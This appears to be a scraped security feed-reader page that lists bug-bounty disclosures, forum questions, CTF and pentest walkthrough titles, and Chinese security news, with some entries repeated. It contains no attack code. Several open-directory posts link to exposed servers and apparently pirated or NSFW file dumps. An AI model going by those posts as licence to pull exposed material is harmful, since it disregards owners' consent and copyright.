    Cyberspace Vault Osint
    Task Continue reading on Medium »
  • Open

    [h1-2102] Information disclosure - ShopifyPlus add user displays existing Shopify ID fullname
    Shopify disclosed a bug submitted by francisbeaudoin: https://hackerone.com/reports/1083922 - Bounty: $1900
    Bypass For #997350 your-store.myshopify.com preview link is leak on third party website Via Online Store
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1015283 - Bounty: $500
    Password reset token leak via "Host header" on third party website
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1092831
    Orders full read for a staff with only `Customers` permissions.
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1392032 - Bounty: $800
    Critically Sensitive Spring Boot Endpoints Exposed
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1022048 - Bounty: $5000
    Sending Arbitrary Requests through Jupyter Notebooks on gitlab.com and Self-Hosted GitLab Instances
    GitLab disclosed a bug submitted by iwis: https://hackerone.com/reports/970869 - Bounty: $1500
    Installing Gitlab runner with Docker-In-Docker allows root access
    GitLab disclosed a bug submitted by jafarakhondali: https://hackerone.com/reports/1417211 - Bounty: $100
    Node.js Certificate Verification Bypass via String Injection
    Node.js disclosed a bug submitted by bengl: https://hackerone.com/reports/1429694
  • Open

    RCE vs Code Injection
    Hi, what's the difference between RCE and Code Injection ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    What is the type of vulnerability called where you put the wrong file extension in the URL on a file that you shouldnt have access to?
    I accidentally discovered something like that during a very beginners CFT challenge. We were supposed to do an SQL injection to get a config file but I for some reason put config.php in the URL and got the file to the browser. I reported it to the people holding the CFT and they said they reported it to the maker of the serversoftware. I believe the software was opensource so it would be fun to find a note somewhere that they fixed it. That is why I wonder what this type of vulnerability is called. submitted by /u/HugoTRB [link] [comments]  ( 2 min )
    What’s your pentesting workbench?
    I am going to create a set of servers for pentest and I would like your suggestions/advice/comments. I would buy three servers , one for exploit dev /marvel analysis preferably a debian(kali or Ubuntu ) and other two for pentesting . submitted by /u/Sea_Finish6689 [link] [comments]  ( 3 min )
  • Open

    Email Forensics CTF Now Live
    Hello, folks! Our Email Forensics Capture The Flag Competition is now live! The event comprises weekly challenges for ten weeks. https://m.klr.co/kMhMA Good luck, and have fun! submitted by /u/MetaspikeHQ [link] [comments]  ( 1 min )
    Black screen and flashing cursor on boot when running SIFT Workstation in VirtualBox
    I'm not sure if this is the correct place to post, apologies if it isn't. I have downloaded the SIFT Workstation OVA file from Sans website and opened it in VirtualBox. I get a boot menu where I can either just start Ubuntu or run the memory test application. Choosing Ubuntu, I just get a black screen with a flashing underscore cursor in top left corner. It has been standing there for 10 minutes now and nothing happens. It never gets to the logon screen. I have seen others mention the issue when searching for it, but I haven't found any mentioned solutions. Any ideas? submitted by /u/kennethfinnerup [link] [comments]  ( 1 min )
    Question about $Ntuninstall files..
    So I was nosing around an old HDD that had XP installed , and I come across these folders in the WINDOWS directory. Inside them, there are files called “spuninst”. So I open them in notepad and there is a system.snapshot heading with a bunch of programs and such listed. My first question is- Is this every program that was installed at this particular moment in time on the computer? Is there way to see when past programs were installed and subsequently deleted if there are no files to look at creation dates? Thanks for any help submitted by /u/Pubh12 [link] [comments]  ( 1 min )
  • Open

    Social Engineering Basics: How to Win Friends and Infiltrate Businesses
    Technology changes and defenses get better, but some things stay the same—like human gullibility, which can be easily exploited through social engineering. What is social engineering? Social engineering, at its core, is taking advantage of human nature. Humans are innately trusting, often try to help, and want to avoid confrontation. A big facet of social... The post Social Engineering Basics: How to Win Friends and Infiltrate Businesses appeared first on TrustedSec.  ( 5 min )
  • Open

    Vulnerability Reward Program: 2021 Year in Review
    Article URL: https://security.googleblog.com/2022/02/vulnerability-reward-program-2021-year.html Comments URL: https://news.ycombinator.com/item?id=30289291 Points: 1 # Comments: 0  ( 12 min )
    Responding to and Learning from the Log4Shell Vulnerability
    Article URL: https://www.hsgac.senate.gov/hearings/responding-to-and-learning-from-the-log4shell-vulnerability Comments URL: https://news.ycombinator.com/item?id=30284252 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SecWiki News 2022-02-10 Review
    Top 10 web hacking techniques of 2021 by ourren A Tale of DOM-based XSS! by ourren 利用RITA检测beacon通信 by ourren CVE-2021-33742:Internet Explorer MSHTML堆越界写漏洞分析 by ourren 企业面对APT化攻击的防御困境 by ourren CobaltStrike 区块链网络上线方式及检测 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-10 Review
    Top 10 web hacking techniques of 2021 by ourren A Tale of DOM-based XSS! by ourren 利用RITA检测beacon通信 by ourren CVE-2021-33742:Internet Explorer MSHTML堆越界写漏洞分析 by ourren 企业面对APT化攻击的防御困境 by ourren CobaltStrike 区块链网络上线方式及检测 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Lots of porn photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
    [NSFW} nastyflixxx.net
    http://www.nastyflixxx.net/clips/?C=S;O=A submitted by /u/mrcave81 [link] [comments]
    Some NOAA Hurricane Files
    https://www.nhc.noaa.gov/video/ Nothing really that interesting submitted by /u/420danger_noodle420 [link] [comments]
    FTP of a Russian ISP (Ufanet)
    You can find some good stuff in it I thinks ? http://ftp.ufanet.ru/ Url: http://ftp.ufanet.ru/ Urls file Extension (Top 5) Files Size .iso 363 384,42 GiB .xz 283 105,96 GiB .img 136 52,78 GiB .tar 16 647 29,78 GiB .bz2 112 29,21 GiB Dirs: 10 532 Ext: 188 Total: 24 123 Total: 664,74 GiB Date (UTC): 2022-02-10 01:01:31 Time: 00:03:28 Speed: 2,01 MB/s (16,1 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    Some site's wp-content/uploads pages
    https://www.the8bitguy.com/wp-content/uploads/ ​ https://tomorrowcorporation.com/blog/wp-content/uploads/ submitted by /u/ilikemacsalot [link] [comments]
    Informatic related Stuff (In French)
    https://download.d-l.fr/apache_listing/ or https://download.d-l.fr (It's the same content but different UI ) http://s472165864.onlinehome.fr/anywarare/index.php?dir=| Url: https://download.d-l.fr/apache_listing/ Urls file Extension (Top 5) Files Size .iso 112 233,52 GiB .zip 101 24,71 GiB .exe 169 17,93 GiB .xz 7 4,65 GiB .1 1 4,4 GiB Dirs: 150 Ext: 46 Total: 572 Total: 296,05 GiB Date (UTC): 2022-02-10 00:55:22 Time: 00:00:35 Speed: 23,48 MB/s (187,8 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) Url: http://s472165864.onlinehome.fr/anywar... Urls file Extension (Top 5) Files Size .zip 808 69,32 GiB .iso 26 63,33 GiB .exe 604 60,11 GiB .001 2 6,6 GiB .002 2 6,4 GiB Dirs: 285 Ext: 23 Total: 1 868 Total: 212,62 GiB Date (UTC): 2022-02-10 00:59:03 Time: 00:00:09 Speed: Failed Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    Watch "Welcome to C0V3RT - Exploration of ALL THINGS "Covert Entry"" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
    Dump Information for Process using GetTokenInformation
    In this post, you will get a very thorough step-by-step walkthrough on building your own process token dumper in the c++ which will help you in knowing your target better before launching another post exploitation attack. https://tbhaxor.com/dumping-token-information-in-windows/ submitted by /u/tbhaxor [link] [comments]
  • Open

    福利 | 缤纷优选,乐享元宵——来FB商城一起过节吧!
    2.14-2.17,来FB商城过元宵吧
    克隆版海盗湾网站正对数百万用户传播恶意广告
    据Cyber​​News安全研究人员发现,5个伪装成著名BT盗版资源网站海盗湾的恶意站点,每月向超过700万名用户提供恶意广告。  ( 1 min )
    《广东省公共数据安全管理办法(征求意见稿)》发布,强调公共数据的安全性
    《征求意见稿》共六章三十二条,加强数字政府公共数据安全管理,规范公共数据处理活动,促进数据资源有序开发利用,保护个人、组织的合法权益。
    记一次挖矿病毒的应急响应
    记一次挖矿病毒的应急响应  ( 1 min )
    小程序测试流程
    流程分为两个方面,解包可以挖掘信息泄露问题、隐藏的接口,抓包可以测试一些逻辑漏洞、API安全问题。  ( 1 min )
    Windows 11更新要小心了,恶意软件已经盯上它
    就在Windows 11系统广泛部署阶段,RedLine恶意软件团伙已经悄悄盯上了这波更新,已经做好了充足的攻击前准备。  ( 1 min )
    FreeBuf早报 | 英特尔发现16个与BIOS相关的新漏洞;海盗湾克隆针对数百万用户使用恶意软件
    CyberNews 的研究人员发现了五个海盗湾的克隆版本,每个月向超过 700 万用户提供恶意广告。  ( 1 min )
  • Open

    Custom Payloads로 ZAP 스캐닝 강화 🚀
    오늘은 제가 최근에 ZAP에서 약간 관심있게 보고있던 기능 하나를 소개해드릴까 합니다. 바로 Custom Payloads인데요. Fuzzer나 ZAP의 Scripting engine을 사용하지 않고 조금 더 쉽게 지정된 페이로드 기반으로 테스트를 할 수 있어서 알아두시면 보안 테스팅이나 자동화 구현에서 잘 사용하실 수 있을거란 생각이 듭니다. 그럼 시작해보죠 :D Custom Payloads Custom Payloads는 ZAP의 Active Scan, Passive Scan에서 사용자가 지정한 Payloads를 기반으로 사용할 수 있도록 제공해주는 기능이자 Addon입니다. 현재까진 2개의 카테고리를 사용할 수 있으며, 스캔에 붙어서 돌기 때문에 카테고리가 늘어날 수록 기능의 이점이 점점 커질거란 생각이 듭니다.

  • Open

    Is there a way to find out what server/ip adrdress a program accesses?
    I'm trying to find the server so I can ping to that manually but I don't know if that's possible. I'm almost a beginner in this, I want to know the pinging time. submitted by /u/Mayhem_8116 [link] [comments]  ( 1 min )
    Why is it common practice to reset a password after a few failed attempts?
    Hi Netsec people! Every once in a while I will get emails saying that some website/service I’m registered on has reset my password because of too many failed log in attempts. Now I’m not too surprised by the attempts, since according to HaveIBeenPwned, my credentials have been ‘exposed’ over 30 times in breaches dating back to the early 2010s. However, a while back I gave up my terrible practice of using 1 password across multiple services and migrated to using a password manager, and now all of my passwords to every service I’m on are randomly generated, so I’m not too worried by these attempts. My question is this: Why does the most common practice seem to be for services to reset your password after a few failed attempts? To me that seems like if x log in attempts failed, the password was robust/held up—why force the user to change it? If the user used a random generator, repeated tries that are time separated (I.e. wait 10min before trying again) probably won’t get an attacker anywhere. If a person isn’t using a password manager/generator then forcing the user to reset might actually lead them to use a weaker password since they will have to come up with something familiar, and there are only so many familiar items a person can keep track of at a time… I’d love to hear some insights on to why this reset after x tries approach appears to be such a pervasive (and counterintuitive) practice! Sorry if this isn’t the right place for a question like this! submitted by /u/KrishanuAR [link] [comments]  ( 2 min )
    Hosts making DNS queries to malicious site. How to dig deeper and find source?
    I have some infected hosts in LAN making a communication with C&C server and bots but that URL seems to be hidden behind Cloudflare CDN as per wireshark sniffing on infected host. In other words, I must say hosts are making DNS queries to malicious site. Our PAs with DNS filtering has blocked the domain since it flagged as malicious How I can find the source of infection on the host ? Any tools I can use which process or application making DNS queries ? Any advise how to dig deeper and what process is making these queries so we can get rid of these logs ? submitted by /u/techno_it [link] [comments]  ( 3 min )
    Does this report that Palestinian threat actor is behind new Mid East phishing attacks sound right?
    Known Palestinian threat actor MoleRats is likely behind a recent malicious email campaign targeting Middle Eastern governments, foreign-policy think tanks and a state-affiliated airline with a new intelligence-gathering trojan dubbed NimbleMamba, researchers said via Threatpost. https://threatpost.com/molerats-apt-trojan-cyberespionage-campaign/178305/ submitted by /u/Technical-Tea-4902 [link] [comments]  ( 1 min )
    RCE vs Command Injection
    Hi, what's the difference between RCE and Command Injection ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Setting up a security program
    So a long time ago some of the higher ups decided we should have a security program within our product development, the idea was that there would be one person in each scrum team responsible for promoting security and they would get some additional training to help with that. Like a lot of these central programs it continued for a few months and then was quickly forgotten about. Now I've been tasked with setting up our own version in the division as the central version is pretty much dead but they're still pushing the general idea. This is what is currently on my list - Security champions to be Security+ certified (I know it's a broad basic cert but I figure we can get funding for this and then progress to more advanced targeted training) - Add a method into Jira for tracking security related issues separately - Create discrete security projects as epics so we can fix some of the legacy issues completely and not worry about them anymore (current ideas for these include: removing third party services to reduce exposure, updating some very old libraries, updating SQL user security etc) Any other ideas of things I could introduce? submitted by /u/dbxp [link] [comments]  ( 3 min )
    CVSS calculation weight reasoning
    Hello AskNetsec. I was wondering if there is a resource describing the CVSS calculation reasoning. Not just how the CVSS is calculated by also the reasoning behind the weight of the different variables. For example in the specification (https://www.first.org/cvss/specification-document) under "CVSS v3.1 Equations", WHY is ISS = 6.42 * ISS? Where does 6.42 come from. Is there any research paper or whitepaper for this? submitted by /u/someuserman [link] [comments]  ( 1 min )
    Question patching build-in python on macOS
    Do I need to patch / install a new version of Python manually, in order to fix the vulnerability of Python on my macOS? For example, my macOS is upgraded to Monterey 12.1, but my Python version is still 3.7.9, which is vulnerable to CVE-2021-3177. I tried to search the vulnerability, say CVE-2021-3177 is that affected my version of macOS. However, Apple seems didn't put that information into their security update documentation. submitted by /u/20151124 [link] [comments]  ( 1 min )
  • Open

    npm weak links
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]
    New release of 🔥Kubesploit v0.1.3🔥
    submitted by /u/jat0369 [link] [comments]
    Top 10 web hacking techniques of 2021
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    My SQLi adventure or: why you should make sure your WAF is configured properly
    submitted by /u/gsk-upxyz [link] [comments]
  • Open

    Is the Google Bucket Meant To Be Publicly Listable? https://cdn.shopify.com/shop-assets/
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102546 - Bounty: $500
    staffOrderNotificationSubscriptionDelete Could Be Used By Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102660 - Bounty: $500
    staffOrderNotificationSubscriptionCreate Is Not Blocked Entirely From Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102652 - Bounty: $900
    Race condition in User comments Likes
    Zomato disclosed a bug submitted by 0xdexter: https://hackerone.com/reports/1409913 - Bounty: $150
    Reflected xss on ads.tiktok.com using `from` parameter.
    TikTok disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1452375 - Bounty: $6000
  • Open

    Coordinated vulnerability disclosure (CVD) for open source projects
    Article URL: https://github.blog/2022-02-09-coordinated-vulnerability-disclosure-cvd-open-source-projects/ Comments URL: https://news.ycombinator.com/item?id=30278015 Points: 1 # Comments: 0  ( 8 min )
  • Open

    Basic Web Technologies Knowledge required for starting with the web Exploitation Part 1
    Hello Guys Myself Manan Aggarwal BTech Student is here Present you the information about the Basic Technology which you need to require… Continue reading on Medium »  ( 4 min )
    Hacking with Rake
    Rake is a utility that can be used to automate tasks. For a example, if program needs to be set up in a certain way. Rake could be used to… Continue reading on Medium »
    How i made 15k$ from Remote Code Execution Vulnerability
    Hello Everyone 👋 Continue reading on Medium »  ( 1 min )
    How I hacked Google to read files from their servers for free!
    Hey Guys, This is Harish! I used to hunt to Microsoft and Google VRP, This is my first write up! Continue reading on Medium »  ( 1 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it. Continue reading on InfoSec Write-ups »  ( 3 min )
    QuickSwap’s New UI Alpha $50,000 Bug Bounty
    TL; DR: Continue reading on Medium »  ( 1 min )
    XDAG new version of wallet (0.4.0) officially released
    Repost of the 2011–11–05 news on xdag.io Continue reading on Medium »  ( 1 min )
    XDAG Mars Project
    repost of 2021–05–09 news on xdag.io Continue reading on Medium »  ( 4 min )
    XDAG Java Edition Testing Tutorial
    Hello to all, As some of you know, we are currently working on making the project more attractive to developers. Continue reading on Medium »  ( 2 min )
    Login function module: User Authentication .
    Input: User id and Password SQL: select * from admin where user_id = 'admin' and password=’****' Continue reading on Medium »
  • Open

    Introducing BloodHound 4.1 — The Three Headed Hound
    Prior Work Continue reading on Posts By SpecterOps Team Members »  ( 3 min )
    CRTO Review (Certified Red Team Operator)
    I had a certificate by successfully completing the CRTO exam in the past days, and while my knowledge was still fresh, I decided to write… Continue reading on Medium »  ( 4 min )
    Raspberry Pi Pico as a Rubber Ducky
    Kurulum Continue reading on Medium »  ( 1 min )
  • Open

    Top 10 Security Tips to Keep Your WordPress Site Healthy
    As we go through the winter months and whether changes, many of us go to our local pharmacy and take advantage of a flu shot. We do this because maybe we have had the flu before and the second of pain from the jab is nothing in comparison to the hours and days of sickness from catching the flu bug.  As everyone’s grandparents tell them, “An ounce of prevention is worth a pound of cure. Continue reading Top 10 Security Tips to Keep Your WordPress Site Healthy at Sucuri Blog.
  • Open

    RootMe | TryHackMe Walkthrough
    Write-ups TryHackMe Challege  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSql Injection, as you know this is my first time of NoSql Injection, so I was learning a lot from tryhackme.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    RootMe | TryHackMe Walkthrough
    Write-ups TryHackMe Challege  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSql Injection, as you know this is my first time of NoSql Injection, so I was learning a lot from tryhackme.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    RootMe | TryHackMe Walkthrough
    Write-ups TryHackMe Challege  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSql Injection, as you know this is my first time of NoSql Injection, so I was learning a lot from tryhackme.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    SecWiki News 2022-02-09 Review
    2022勒索软件和恶意软件报告 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-09 Review
    2022勒索软件和恶意软件报告 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Movies and TV-shows (Good speed)
    submitted by /u/lnsideMyHead [link] [comments]
    Anime and some Music
    submitted by /u/mingaminga [link] [comments]
    Index of /Johnny Cash CDs/
    submitted by /u/mingaminga [link] [comments]
    A lot of software, Games, Film and series in various language
    http://103.222.20.150/ftpdata/ Url: http://103.222.20.150/ftpdata/ Urls file Extension (Top 5) Files Size .mp4 12,912 11.59 TiB .mkv 9,042 9.3 TiB .avi 2,965 1.38 TiB .rar 21 36.18 GiB 16 19.15 GiB Dirs: 16,920 Ext: 59 Total: 46,363 Total: 22.4 TiB Date (UTC): 2022-02-08 23:34:44 Time: 01:48:31 Speed: 0.00 MB/s (0.0 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    CVE-2022–22718: Windows Print Spooler Privilege Escalation
    Article URL: https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81?gif=true Comments URL: https://news.ycombinator.com/item?id=30273774 Points: 3 # Comments: 1  ( 11 min )
    CVE-2022-21703: cross-origin request forgery against Grafana
    Article URL: https://jub0bs.com/posts/2022-02-08-cve-2022-21703-writeup/ Comments URL: https://news.ycombinator.com/item?id=30270751 Points: 1 # Comments: 0  ( 10 min )
  • Open

    Simply GeoEstimation — OSINT Challenge 13
    On Dec 20, 2021, OSINT Dojo shared a OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 10
    In this article I will explain how to solve Hacktoria’s Geolocation 10 challenge. However, I must give a quick disclaimer first. I already… Continue reading on Medium »  ( 5 min )
  • Open

    Can deleted WhatsApp conversations from an iPhone be recovered without backup?
    I deleted a very important conversation on WhatsApp 2 days ago. The iPhone 12 (running iOS 15.x) in question has been powered off and hasn't been used since. I understand that WhatsApp saves a backup copy in Android phones' local memory everyday at 2am and erase them every 7 days, however I can't find anything about iOS devices. To make matter worse, I deleted the conversation around 7pm, so before the local backup could trigger at 2am. Is there any chance to get this conversation back without any backup? And what would my chances be with a Cellebrite device? submitted by /u/Strangedreamest [link] [comments]  ( 2 min )
  • Open

    信息安全技术 移动互联网应用程序(App)生命周期安全管理指南(征求意见稿)发布
    《征求意见稿》共六章,分别是范围、规范性引用文件、术语和定义、缩略语、概述和生命周期管理,对安全需求、安全建议、安全管理等给出了指导意见。
    FreeBuf早报 | “漫游螳螂”正瞄准欧洲;沃达丰葡萄牙分公司遭大规模网络攻击
    沃达丰葡萄牙分公司遭受网络攻击,导致该国通讯和电视服务严重中断。  ( 1 min )
    慢雾:美国执法部门破获 2016 年 Bitfinex 被黑案件细节分析
    一个疑点:真正攻击 Bitfinex 的盗币黑客是谁?  ( 1 min )
    NetWalker勒索软件成员被判80个月监禁
    近期,加拿大男子Sebastian Vachon-Desjardins因参与NetWalker勒索攻击,被判处6年零八个月监禁。
    关于SSRF和多种绕过方式
    SSRF漏洞形成的原因主要是服务器端所提供的接口中包含了所要请求内容的URL参数,并且未对客户端所传输过来的URL参数进行过滤。  ( 1 min )
    Puma遭遇勒索攻击致数据泄漏、微软修复48个安全漏洞|2月9日全球网络安全热点
    运动服装制造商Puma在2021年12月对其北美劳动力管理服务提供商之一Kronos发起勒索软件攻击后,遭到数据泄露。
    全球工业网络安全状况调查
    【编者按】工业组织在2021年面临重大挑战。对佛罗里达州Oldsmar供水设施、Colonial管道和JBS的网络攻击,以及Solar  ( 1 min )
    “漫游螳螂”恶意软件触角伸向欧洲
    犯罪分子能够利用偷来的照片以其他方式获得钱财,如敲诈或性骚扰等。  ( 1 min )
    以色列监控公司 QuaDream遭曝光
    “据五位知情人士透露,以色列监控公司 NSO Group 在 2021 年利用苹果软件中的一个漏洞 侵入 iPhone,同时也被一家竞争公司滥用。” 根据路透社发表的文章,“有人透露这家名为的QuaDream 是一家规模较小、知名度较低的以色列公司,它还为政府客户开发智能手机黑客工具。”QuaDream是由以色列前军官 Ilan Dabelstein 和两名前 NSO 员工 Guy Geva 和  ( 1 min )
    微软禁用ms-appinstaller 协议,以阻止恶意软件传播
    微软宣布已在Win10/11系统中暂时禁用MSIX应用程序安装器的ms-appinstaller 协议,以防被恶意软件滥用。
    请及时更新,微软2月修复48个重要漏洞,1个零日漏洞
    2022年2月8日,微软发布了一系列的漏洞补丁,共修复48 个漏洞,以及一个零日漏洞。  ( 1 min )
    《金融标准化“十四五”发展规划》发布,强化金融网络安全标准防护
    《规划》提出要强化金融网络安全标准防护。健全金融业网络安全与数据安全标准体系。 建立健全金融业关键信息基础设施保护标准体系,支持提升安全防护能力。
  • Open

    PrivateLoader: 众多恶意软件方案的第一步
    译者:知道创宇404实验室翻译组 原文链接:https://intel471.com/blog/privateloader-malware 长久以来,安装付费(PPI)恶意软件服务已经成为网络犯罪生态系统不可分割的一部分。恶意软件运营者提供支付、恶意有效载荷和目标信息,负责运行服务的人把分发和传播部分外包出去。可访问性和合适的成本使得恶意软件运营商可以利用这些服务作为一种武器,用于快速、批量...
    PrivateLoader: 众多恶意软件方案的第一步
    译者:知道创宇404实验室翻译组 原文链接:https://intel471.com/blog/privateloader-malware 长久以来,安装付费(PPI)恶意软件服务已经成为网络犯罪生态系统不可分割的一部分。恶意软件运营者提供支付、恶意有效载荷和目标信息,负责运行服务的人把分发和传播部分外包出去。可访问性和合适的成本使得恶意软件运营商可以利用这些服务作为一种武器,用于快速、批量...
    重建世界:The Sandbox 任意燃烧漏洞回顾
    作者:Victory@慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/UECwAt_p8rXn-3kZ4kC2VQ 据慢雾区情报,2022 年 1 月 28 日 The Sandbox 官方发布一则 LAND 智能合约迁移的公告,但是在公告中没有说明合约具体是出了什么问题,慢雾安全团队现将简要分析结果分享如下。 项目背景 The Sandbox 是一个虚拟世...
    重建世界:The Sandbox 任意燃烧漏洞回顾
    作者:Victory@慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/UECwAt_p8rXn-3kZ4kC2VQ 据慢雾区情报,2022 年 1 月 28 日 The Sandbox 官方发布一则 LAND 智能合约迁移的公告,但是在公告中没有说明合约具体是出了什么问题,慢雾安全团队现将简要分析结果分享如下。 项目背景 The Sandbox 是一个虚拟世...
  • Open

    PrivateLoader: 众多恶意软件方案的第一步
    译者:知道创宇404实验室翻译组 原文链接:https://intel471.com/blog/privateloader-malware 长久以来,安装付费(PPI)恶意软件服务已经成为网络犯罪生态系统不可分割的一部分。恶意软件运营者提供支付、恶意有效载荷和目标信息,负责运行服务的人把分发和传播部分外包出去。可访问性和合适的成本使得恶意软件运营商可以利用这些服务作为一种武器,用于快速、批量...
    PrivateLoader: 众多恶意软件方案的第一步
    译者:知道创宇404实验室翻译组 原文链接:https://intel471.com/blog/privateloader-malware 长久以来,安装付费(PPI)恶意软件服务已经成为网络犯罪生态系统不可分割的一部分。恶意软件运营者提供支付、恶意有效载荷和目标信息,负责运行服务的人把分发和传播部分外包出去。可访问性和合适的成本使得恶意软件运营商可以利用这些服务作为一种武器,用于快速、批量...
    重建世界:The Sandbox 任意燃烧漏洞回顾
    作者:Victory@慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/UECwAt_p8rXn-3kZ4kC2VQ 据慢雾区情报,2022 年 1 月 28 日 The Sandbox 官方发布一则 LAND 智能合约迁移的公告,但是在公告中没有说明合约具体是出了什么问题,慢雾安全团队现将简要分析结果分享如下。 项目背景 The Sandbox 是一个虚拟世...
    重建世界:The Sandbox 任意燃烧漏洞回顾
    作者:Victory@慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/UECwAt_p8rXn-3kZ4kC2VQ 据慢雾区情报,2022 年 1 月 28 日 The Sandbox 官方发布一则 LAND 智能合约迁移的公告,但是在公告中没有说明合约具体是出了什么问题,慢雾安全团队现将简要分析结果分享如下。 项目背景 The Sandbox 是一个虚拟世...

  • Open

    Hypothetical incident: what would be an appropriate response?
    Hello AskNetSec! I am curious what you all would consider an appropriate response to an incident such as a user reporting that they've clicked on a phishing link. Personally, I believe it is appropriate to probe about what popped up after clicking the link, whether or not they entered any of their information, and whether or not they notice any abnormal behavior on their computer after clicking on the link. After that, have the user change their password as a precaution and move on begin monitoring. I figure between the questions assuring they did nothing more than click, a password change, existing security controls such as CrowdStrike, and monitoring for abnormal behavior, there isn't much more that makes sense to do. Others on my team seem to think it's worth downloading Microsoft Safety Scanner and running a full system scan, which I argue doesn't hurt, but also probably doesn't add much value unless something is seen on the user's computer that would prompt further investigation. Especially since I can't imagine Microsoft Safety Scanner is going to 